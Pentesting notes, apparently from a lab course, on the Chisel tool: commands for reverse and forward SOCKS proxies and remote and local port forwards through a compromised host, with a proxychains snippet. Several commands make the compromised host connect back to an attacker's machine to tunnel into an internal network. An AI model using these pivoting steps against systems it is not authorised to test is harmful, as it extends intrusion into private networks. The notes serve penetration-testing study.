Chisel
Is used to quickly and easily set up a tunnelled proxy or port forward through a compromised system, regardless of whether you have SSH access or not. It's written in Golang and can be easily compiled for any system.
https://github.com/jpillora/chisel/releases
The chisel binary has two modes: client and server. You can access the help menus for either with the command:
chisel client|server --help
Chisel Reverse SOCKS Proxy:
This connects back from a compromised server to a listener waiting on our attacking machine.
On our own attacking box we would use a command that looks something like this:
./chisel server -p LISTEN_PORT --reverse &
Notice that, despite connecting back to port 1337 successfully, the actual proxy has been opened on 127.0.0.1:1080.
As such, we will be using port 1080 when sending data through the proxy.
Forward SOCKS Proxy:
In many ways the syntax for this is simply reversed from a reverse proxy.
First, on the compromised host we would use:
./chisel server -p LISTEN_PORT --socks5On our own attacking box we would then use:
./chisel client TARGET_IP:LISTEN_PORT PROXY_PORT:socksIn this command, PROXY_PORT is the port that will be opened for the proxy.
For example,
./chisel client 172.16.0.10:8080 1337:sockswould connect to a chisel server running on port8080of172.16.0.10.A SOCKS proxy would be opened on port
1337of our attacking machine.
Proxychains Reminder:
When sending data through either of these proxies, we would need to set the port in our proxychains configuration.
As Chisel uses a SOCKS5 proxy, we will also need to change the start of the line from socks4 to socks5:
[ProxyList]
# add proxy here ...
# meanwhile
# defaults set to "tor"
socks5 127.0.0.1 1080Chisel Remote Port Forward:
A remote port forward is when we connect back from a compromised target to create the forward.
For a remote port forward, on our attacking machine we use the exact same command as before:
./chisel server -p LISTEN_PORT --reverse &Once again this sets up a chisel listener for the compromised host to connect back to.
The command to connect back is slightly different this time, however:
./chisel client ATTACKING_IP:LISTEN_PORT R:LOCAL_PORT:TARGET_IP:TARGET_PORT &Let's assume that our own IP is
172.16.0.20, the compromised server's IP is172.16.0.5, and our target is port22on172.16.0.10. The syntax for forwarding172.16.0.10:22back to port2222on our attacking machine would be as follows:
./chisel client 172.16.0.20:1337 R:2222:172.16.0.10:22 &Connecting back to our attacking machine, functioning as a chisel server started with:
./chisel server -p 1337 --reverse &This would allow us to access
172.16.0.10:22(via SSH) by navigating to127.0.0.1:2222.
Chisel Local Port Forward:
As with SSH, a local port forward is where we connect from our own attacking machine to a chisel server listening on a compromised target.
On the compromised target we set up a chisel server:
./chisel server -p LISTEN_PORTWe now connect to this from our attacking machine like so:
./chisel client LISTEN_IP:LISTEN_PORT LOCAL_PORT:TARGET_IP:TARGET_PORTFor example, to connect to
172.16.0.5:8000(the compromised host running a chisel server), forwarding our local port2222to172.16.0.10:22(our intended target), we could use:
./chisel client 172.16.0.5:8000 2222:172.16.0.10:22Last updated